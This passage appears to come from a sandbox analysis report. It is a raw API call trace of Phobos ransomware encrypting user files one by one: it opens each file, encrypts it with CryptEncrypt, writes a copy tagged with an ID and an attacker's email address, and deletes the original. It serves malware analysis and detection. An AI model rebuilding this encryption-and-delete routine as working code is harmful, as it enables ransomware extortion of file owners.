HALPmcxz\\AppData\\Roaming\\wpS2V9tUZkF.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wps2v9tuzkf.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.677] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.677] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.677] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4420, lpOverlapped=0x0) returned 1 [0195.679] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4430, dwBufLen=0x4430 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4430) returned 1 [0195.679] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4430, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4430, lpOverlapped=0x0) returned 1 [0195.680] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.680] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.680] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.680] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.680] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.680] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.680] CloseHandle (hObject=0xac) returned 1 [0195.680] CloseHandle (hObject=0xb8) returned 1 [0195.680] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wpS2V9tUZkF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wps2v9tuzkf.flv")) returned 1 [0195.683] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y5s6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y5s6.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.684] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8647) returned 1 [0195.684] CloseHandle (hObject=0xb8) returned 1 [0195.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y5s6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y5s6.wav")) returned 0x2020 [0195.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y5s6.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y5s6.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y5s6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y5s6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.685] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.685] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y5s6.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y5s6.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.685] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.685] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.685] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x21c7, lpOverlapped=0x0) returned 1 [0195.687] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x21d0, dwBufLen=0x21d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x21d0) returned 1 [0195.687] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x21d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x21d0, lpOverlapped=0x0) returned 1 [0195.688] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.688] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.688] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.688] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.688] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.688] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.688] CloseHandle (hObject=0xb8) returned 1 [0195.688] CloseHandle (hObject=0xac) returned 1 [0195.688] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y5s6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y5s6.wav")) returned 1 [0195.689] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_c53.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c53.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.691] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=34292) returned 1 [0195.691] CloseHandle (hObject=0xac) returned 1 [0195.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_c53.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c53.wav")) returned 0x2020 [0195.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_c53.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c53.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_c53.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c53.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.692] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.692] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_c53.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c53.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.692] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.692] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.692] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x85f4, lpOverlapped=0x0) returned 1 [0195.697] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8600, dwBufLen=0x8600 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8600) returned 1 [0195.697] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8600, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8600, lpOverlapped=0x0) returned 1 [0195.698] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.698] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.698] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.698] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.698] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.698] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.699] CloseHandle (hObject=0xac) returned 1 [0195.699] CloseHandle (hObject=0xb8) returned 1 [0195.699] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_c53.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c53.wav")) returned 1 [0195.700] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_C79B2a4_n0vfXJt6.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c79b2a4_n0vfxjt6.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.700] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13795) returned 1 [0195.700] CloseHandle (hObject=0xb8) returned 1 [0195.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_C79B2a4_n0vfXJt6.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c79b2a4_n0vfxjt6.odp")) returned 0x2020 [0195.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_C79B2a4_n0vfXJt6.odp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c79b2a4_n0vfxjt6.odp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_C79B2a4_n0vfXJt6.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c79b2a4_n0vfxjt6.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.701] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.701] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_C79B2a4_n0vfXJt6.odp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c79b2a4_n0vfxjt6.odp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.702] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.702] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.702] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x35e3, lpOverlapped=0x0) returned 1 [0195.703] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x35f0, dwBufLen=0x35f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x35f0) returned 1 [0195.703] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x35f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x35f0, lpOverlapped=0x0) returned 1 [0195.704] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.704] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.704] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0195.704] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.704] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0195.706] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.706] CloseHandle (hObject=0xb8) returned 1 [0195.706] CloseHandle (hObject=0xac) returned 1 [0195.706] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_C79B2a4_n0vfXJt6.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_c79b2a4_n0vfxjt6.odp")) returned 1 [0195.708] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_WkKzsf7W.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_wkkzsf7w.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.708] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2019) returned 1 [0195.708] CloseHandle (hObject=0xac) returned 1 [0195.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_WkKzsf7W.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_wkkzsf7w.bmp")) returned 0x2020 [0195.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_WkKzsf7W.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_wkkzsf7w.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_WkKzsf7W.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_wkkzsf7w.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.709] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.709] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_WkKzsf7W.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_wkkzsf7w.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.710] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.710] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.710] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7e3, lpOverlapped=0x0) returned 1 [0195.712] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7f0, dwBufLen=0x7f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7f0) returned 1 [0195.712] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7f0, lpOverlapped=0x0) returned 1 [0195.712] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.712] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.713] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.713] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.713] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.713] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.713] CloseHandle (hObject=0xac) returned 1 [0195.713] CloseHandle (hObject=0xb8) returned 1 [0195.713] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_WkKzsf7W.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_wkkzsf7w.bmp")) returned 1 [0195.714] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.714] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=412) returned 1 [0195.714] CloseHandle (hObject=0xb8) returned 1 [0195.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini")) returned 0x26 [0195.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.715] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.715] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.716] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.716] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.716] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x19c, lpOverlapped=0x0) returned 1 [0195.716] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0) returned 1 [0195.716] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1a0, lpOverlapped=0x0) returned 1 [0195.717] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.717] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.718] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, 